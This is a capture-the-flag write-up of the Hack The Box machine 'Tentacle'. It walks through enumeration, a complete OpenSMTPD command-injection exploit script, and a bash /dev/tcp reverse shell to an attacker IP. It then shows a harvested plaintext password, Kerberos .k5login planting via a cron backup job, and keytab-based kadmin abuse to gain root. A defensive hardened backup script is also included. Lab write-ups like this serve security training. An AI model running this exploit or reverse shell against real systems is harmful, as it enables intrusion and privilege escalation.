## About

| Tentacle | |
|---|---|
| IP | 10.129.108.83 |
| OS | Linux |
| Difficulty | Hard |
## nmap

```text
└─$ nmap -Pn -sV -sC -p- -oA Tentacle 10.129.109.74
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-20 05:56 EDT
Stats: 0:00:23 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 0.36% done
Stats: 0:01:10 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 1.44% done; ETC: 07:19 (1:21:08 remaining)
Stats: 0:22:30 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 68.83% done; ETC: 06:29 (0:10:11 remaining)
Stats: 0:22:30 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 68.83% done; ETC: 06:29 (0:10:12 remaining)
Nmap scan report for 10.129.109.74
Host is up (0.81s latency).
Not shown: 65530 filtered ports
PORT     STATE  SERVICE      VERSION
22/tcp   open   ssh          OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
|   3072 8d:dd:18:10:e5:7b:b0:da:a3:fa:14:37:a7:52:7a:9c (RSA)
|   256 f6:a9:2e:57:f8:18:b6:f4:ee:03:41:27:1e:1f:93:99 (ECDSA)
|_  256 04:74:dd:68:79:f4:22:78:d8:ce:dd:8b:3e:8c:76:3b (ED25519)
53/tcp   open   domain       ISC BIND 9.11.20 (RedHat Enterprise Linux 8)
| dns-nsid:
|_  bind.version: 9.11.20-RedHat-9.11.20-5.el8
88/tcp   open   kerberos-sec MIT Kerberos (server time: 2021-03-20 10:31:34Z)
3128/tcp open   http-proxy   Squid http proxy 4.11
|_http-server-header: squid/4.11
|_http-title: ERROR: The requested URL could not be retrieved
9090/tcp closed zeus-admin
Service Info: Host: REALCORP.HTB; OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:8
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1798.99 seconds
```
## Port 3128

We are met with an error page stating the following:

```text
ERROR
The requested URL could not be retrieved
The following error was encountered while trying to retrieve the URL: /
*Invalid URL*
Some aspect of the requested URL is incorrect.
Some possible problems are:
* Missing or incorrect access protocol (should be "http://" or similar)
* Missing hostname
* Illegal double-escape in the URL-Path
* Illegal character in hostname; underscores are not allowed.
Your cache administrator is j.nakazawa@realcorp.htb.
---
Generated Sat, 20 Mar 2021 10:46:32 GMT by srv01.realcorp.htb (squid/4.11)
```

Out of this we gain two pieces of information:

- `j.nakazawa@realcorp.htb`, the email of the cache administrator, which may come in handy later for a login
- `srv01.realcorp.htb`, the server which is hosting this site
## DNS Enumeration

Given we only have domains to work with, we decide to do some DNS enumeration.

### dig

```text
❯ dig realcorp.htb
; <<>> DiG 9.10.6 <<>> realcorp.htb
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 50617
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;realcorp.htb. IN A
;; AUTHORITY SECTION:
. 60 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2021032100 1800 900 604800 86400
;; Query time: 11 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Sun Mar 21 16:44:47 AEDT 2021
;; MSG SIZE rcvd: 105
```
### gobuster dns

```text
❯ ~ gobuster dns -d realcorp.htb -r 10.10.10.224:53 -i -w Documents/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain: realcorp.htb
[+] Threads: 10
[+] Resolver: 10.10.10.224:53
[+] Show IPs: true
[+] Timeout: 1s
[+] Wordlist: Documents/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
===============================================================
2021/04/16 18:50:54 Starting gobuster in DNS enumeration mode
===============================================================
2021/04/16 18:50:56 [-] Unable to validate base domain: realcorp.htb (lookup realcorp.htb on 127.0.0.1:53: no such host)
Found: ns.realcorp.htb [10.197.243.77]
Found: proxy.realcorp.htb [10.197.243.77]
Found: wpad.realcorp.htb [10.197.243.31]
```
DNS enumeration was a success. We have a few different subdomains to go through. To make accessing these subdomains and IP addresses easier, we need to set up proxychains.

## proxychains

Set up the proxychains configuration file as below, using the Squid proxy on the target and the IP addresses we got above as the chain:

```text
[ProxyList]
# HTB: tentacle
http 10.10.10.224 3128
http 127.0.0.1 3128
http 10.197.243.77 3128
```
## wpad

Now that we can access the subdomains previously found, we visit wpad.realcorp.htb. For context, WPAD stands for Web Proxy Auto-Discovery Protocol.

From Wikipedia:

> The Web Proxy Auto-Discovery (WPAD) Protocol is a method used by clients to locate the URL of a configuration file using DHCP and/or DNS discovery methods. Once detection and download of the configuration file is complete, it can be executed to determine the proxy for a specified URL.

Given this, we `curl` http://wpad.realcorp.htb/wpad.dat through the chain:

```text
$ proxychains curl http://wpad.realcorp.htb/wpad.dat
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-10.10.10.224:3128-<>-127.0.0.1:3128-<>-10.197.243.77:3128-<><>-10.197.243.31:80-<><>-OK
```

The returned PAC file:

```javascript
function FindProxyForURL(url, host) {
    if (dnsDomainIs(host, "realcorp.htb"))
        return "DIRECT";
    if (isInNet(dnsResolve(host), "10.197.243.0", "255.255.255.0"))
        return "DIRECT";
    if (isInNet(dnsResolve(host), "10.241.251.0", "255.255.255.0"))
        return "DIRECT";
    return "PROXY proxy.realcorp.htb:3128";
}
```
## 10.241.251.0

We have already enumerated the 10.197.243.0 network, so we are going to take a look at the other internal range listed in the wpad.dat file:

```text
proxychains nmap -sT --min-rate 2500 -Pn 10.241.251.0/24
```

Which gave us one live host: 10.241.251.113.

```text
proxychains nmap -sT -sC -sV --min-rate 2500 -Pn 10.241.251.113
PORT   STATE SERVICE VERSION
25/tcp open  smtp    OpenSMTPD
| smtp-commands: smtp.realcorp.htb Hello nmap.scanme.org [10.241.251.1], pleased to meet you, 8BITMIME, ENHANCEDSTATUSCODES, SIZE 36700160, DSN, HELP,
|_ 2.0.0 This is OpenSMTPD 2.0.0 To report bugs in the implementation, please contact bugs@openbsd.org 2.0.0 with full details 2.0.0 End of HELP info
Service Info: Host: smtp.realcorp.htb
```
## SMTP Exploit

Google-fu reveals: https://blog.firosolutions.com/exploits/opensmtpd-remote-vulnerability/

```python
#!/usr/bin/env python3
# getShell.py: exploit script for the OpenSMTPD vulnerability referenced above.
# The shell command is smuggled in the MAIL FROM address; the injected loop reads
# and discards the padding lines of the DATA body and then runs the command.
import socket
import sys
import time

if len(sys.argv) < 4:
    print("usage: getShell.py <host> <port> <command>")
    sys.exit(1)

HOST = sys.argv[1]
PORT = int(sys.argv[2])
rev_shell_cmd = sys.argv[3]

# DATA body: padding lines consumed by the injected `read` loop, then the
# command to run, then the terminating "." line.
payload = b"""\r\n
#0\r\n
#1\r\n
#2\r\n
#3\r\n
#4\r\n
#5\r\n
#6\r\n
#7\r\n
#8\r\n
#9\r\n
#a\r\n
#b\r\n
#c\r\n
#d\r\n
""" + rev_shell_cmd.encode() + b"""
.
"""

# Connect to the first address (IPv4 or IPv6) that accepts the connection
s = None
for res in socket.getaddrinfo(HOST, PORT, socket.AF_UNSPEC, socket.SOCK_STREAM):
    af, socktype, proto, canonname, sa = res
    try:
        s = socket.socket(af, socktype, proto)
    except OSError:
        s = None
        continue
    try:
        s.connect(sa)
    except OSError:
        s.close()
        s = None
        continue
    break

if s is None:
    print('could not open socket')
    sys.exit(1)

with s:
    data = s.recv(1024)  # server banner
    print('Received', repr(data))
    time.sleep(1)
    print('SENDING HELO')
    s.send(b"helo test.com\r\n")
    data = s.recv(1024)
    print('RECEIVED', repr(data))
    # The sender address carries the injected shell command
    s.send(b"MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>\r\n")
    time.sleep(1)
    data = s.recv(1024)
    print('RECEIVED', repr(data))
    s.send(b"RCPT TO:<j.nakazawa@realcorp.htb>\r\n")
    data = s.recv(1024)
    print('RECEIVED', repr(data))
    s.send(b"DATA\r\n")
    data = s.recv(1024)
    print('RECEIVED', repr(data))
    s.send(payload)
    data = s.recv(1024)
    print('RECEIVED', repr(data))
    s.send(b"QUIT\r\n")
    data = s.recv(1024)
    print('RECEIVED', repr(data))
    print("Exploited. Check your netcat :D")
    s.close()
```
Exploit using:

```text
proxychains python3 getShell.py 10.241.251.113 25 'bash -c "exec bash -i &> /dev/tcp/10.10.14.9/5050 <&1"'
```

and we get:

```text
$ nc -lvp 5050
Listening on 0.0.0.0 5050
Connection received on 10.10.10.224 49024
bash: cannot set terminal process group (17): Inappropriate ioctl for device
bash: no job control in this shell
root@smtp:~#
```
## SMTP to User

We go to the home directory of our user, j.nakazawa:

```text
root@smtp:/home/j.nakazawa# ls -la
ls -la
total 16
drwxr-xr-x. 1 j.nakazawa j.nakazawa   59 Dec  9 12:31 .
drwxr-xr-x. 1 root       root         24 Dec  8 10:56 ..
lrwxrwxrwx. 1 root       root          9 Dec  9 12:31 .bash_history -> /dev/null
-rw-r--r--. 1 j.nakazawa j.nakazawa  220 Apr 18  2019 .bash_logout
-rw-r--r--. 1 j.nakazawa j.nakazawa 3526 Apr 18  2019 .bashrc
-rw-------. 1 j.nakazawa j.nakazawa  476 Dec  8 19:12 .msmtprc
-rw-r--r--. 1 j.nakazawa j.nakazawa  807 Apr 18  2019 .profile
lrwxrwxrwx. 1 root       root          9 Dec  9 12:31 .viminfo -> /dev/null
root@smtp:/home/j.nakazawa# cat .msmtprc
cat .msmtprc
# Set default values for all following accounts.
defaults
auth on
tls on
tls_trust_file /etc/ssl/certs/ca-certificates.crt
logfile /dev/null
# RealCorp Mail
account realcorp
host 127.0.0.1
port 587
from j.nakazawa@realcorp.htb
user j.nakazawa
password sJB}RM>6Z~64_
tls_fingerprint C9:6A:B9:F6:0A:D4:9C:2B:B9:F6:44:1F:30:B8:5E:5A:D8:0D:A5:60
# Set a default account
account default : realcorp
```

Unfortunately for us, the above credentials do not work directly over ssh. We need to generate a Kerberos ticket in order to log in as j.nakazawa.
## Kerberos

- Installation: `sudo apt install krb5-user`
- Modify `/etc/hosts`:

  ```text
  10.10.10.224 srv01.realcorp.htb
  ```

- Modify `/etc/krb5.conf`:

  ```ini
  [libdefaults]
      default_realm = REALCORP.HTB

  [realms]
      REALCORP.HTB = {
          kdc = 10.10.10.224
      }
  ```

- Ticket generation, using `sJB}RM>6Z~64_` as the password: `kinit j.nakazawa`
- Login: `ssh j.nakazawa@10.10.10.224`
## user.txt

```text
[j.nakazawa@srv01 ~]$ ls
user.txt
[j.nakazawa@srv01 ~]$ cat user.txt
c78abea6075164605c634d08c460bf2c
```
## User to Admin

Through basic enumeration we come across the following:

```text
[j.nakazawa@srv01 ~]$ cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
* * * * * admin /usr/local/bin/log_backup.sh
```

Viewing the log_backup.sh:

```bash
[j.nakazawa@srv01 ~]$ cat /usr/local/bin/log_backup.sh
#!/bin/bash
/usr/bin/rsync -avz --no-perms --no-owner --no-group /var/log/squid/ /home/admin/
cd /home/admin
/usr/bin/tar czf squid_logs.tar.gz.`/usr/bin/date +%F-%H%M%S` access.log cache.log
/usr/bin/rm -f access.log cache.log
```

This script runs as admin every minute and backs up everything from /var/log/squid to /home/admin. Whilst we can't access /var/log/squid directly, we can copy a file into that directory, and rsync will carry it across into /home/admin. A `.k5login` file in a user's home lists the Kerberos principals allowed to log in as that user, so we plant one naming our own principal:

```text
cd /tmp
vim .k5login
j.nakazawa@REALCORP.HTB
:wq
cp .k5login /var/log/squid
```

Once the cron job has copied it into /home/admin, our existing j.nakazawa ticket is accepted for the admin account and we are able to log in as admin: `ssh admin@srv01.realcorp.htb`
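A hardened replacement for this backup job, with a check for the exact artifact used above, as an added example (not the box's script): it copies only the two named log files instead of the whole directory, refuses to run if the source directory is writable by group or others, archives into a dedicated backup directory rather than a home directory, and lists any `.k5login` entry that grants an account to a different principal. Paths are passed as arguments; the directory layout is assumed.

```shell
#!/bin/sh
# Hardened replacement for log_backup.sh plus a .k5login audit. Added example,
# not the script from the box. Assumed layout: $1 holds the squid logs, $2 is
# a dedicated backup directory outside any home; the audit takes a homes root.
set -eu

# Returns 0 when the directory is writable only by its owner, 1 when group or
# others can write into it (then anyone could plant files for the cron job).
source_dir_is_safe() {
    mode=$(stat -c '%a' "$1")
    case "$mode" in
        *[2367][0-7]|*[0-7][2367]) return 1 ;;
    esac
    return 0
}

# Copy an explicit allowlist of log files, never the whole directory, so a
# planted .k5login is left behind, and archive them outside any $HOME.
backup_logs() {
    src="$1"; dest="$2"
    source_dir_is_safe "$src" || { echo "refusing: $src is group/world writable" >&2; return 1; }
    mkdir -p -- "$dest"
    for f in access.log cache.log; do
        cp -- "$src/$f" "$dest/$f"
    done
    stamp=$(date +%F-%H%M%S)
    tar -C "$dest" -czf "$dest/squid_logs.tar.gz.$stamp" access.log cache.log
    rm -f -- "$dest/access.log" "$dest/cache.log"
}

# Detection: print "account:principal" for every .k5login entry under the
# homes root whose principal name does not match the account that owns it.
foreign_k5login_entries() {
    for home in "$1"/*/; do
        user=$(basename "$home")
        [ -f "$home.k5login" ] || continue
        while IFS= read -r line; do
            [ -n "$line" ] || continue
            [ "${line%%@*}" = "$user" ] || echo "$user:$line"
        done < "$home.k5login"
    done
}

if [ $# -eq 2 ]; then
    backup_logs "$1" "$2"
fi
```

Run from cron as `log_backup.sh /var/log/squid /var/backups/squid`; `foreign_k5login_entries /home` would have reported `admin:j.nakazawa@REALCORP.HTB` after the file above landed.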
## Admin to Root

As admin we can read the host keytab, which holds keys for the `kadmin/admin` principal:

```text
[admin@srv01 ~]$ klist -k /etc/krb5.keytab
Keytab name: FILE:/etc/krb5.keytab
KVNO Principal
---- --------------------------------------------------------------------------
   2 host/srv01.realcorp.htb@REALCORP.HTB
   2 host/srv01.realcorp.htb@REALCORP.HTB
   2 host/srv01.realcorp.htb@REALCORP.HTB
   2 host/srv01.realcorp.htb@REALCORP.HTB
   2 host/srv01.realcorp.htb@REALCORP.HTB
   2 kadmin/changepw@REALCORP.HTB
   2 kadmin/changepw@REALCORP.HTB
   2 kadmin/changepw@REALCORP.HTB
   2 kadmin/changepw@REALCORP.HTB
   2 kadmin/changepw@REALCORP.HTB
   2 kadmin/admin@REALCORP.HTB
   2 kadmin/admin@REALCORP.HTB
   2 kadmin/admin@REALCORP.HTB
   2 kadmin/admin@REALCORP.HTB
   2 kadmin/admin@REALCORP.HTB
```

Authenticating to kadmin with that keytab lets us administer the realm, so we create a principal for root with a password of our choosing:

```text
kadmin -k -t /etc/krb5.keytab -p kadmin/admin@REALCORP.HTB
add_principal root@REALCORP.HTB
kadmin: add_principal root@REALCORP.HTB
No policy specified for root@REALCORP.HTB; defaulting to no policy
Enter password for principal "root@REALCORP.HTB":
Re-enter password for principal "root@REALCORP.HTB":
Principal "root@REALCORP.HTB" created.
```

With that principal in place, `ksu` switches to root using the password we just set:

```text
[admin@srv01 ~]$ ksu root
WARNING: Your password may be exposed if you enter it here and are logged
in remotely using an unsecure (non-encrypted) channel.
Kerberos password for root@REALCORP.HTB: :
Authenticated root@REALCORP.HTB
Account root: authorization for root@REALCORP.HTB successful
[Last failed login: Sat Jan 30 15:25:07 GMT 2021 from 10.10.14.128 on ssh:notty]
[There was 1 failed login attempt since the last successful login.]
Changing uid to root (0)
[root@srv01 admin]# whoami && cat /root/root.txt
root
3b69371ab6b9677313f9ac1fe2c8c7d8
```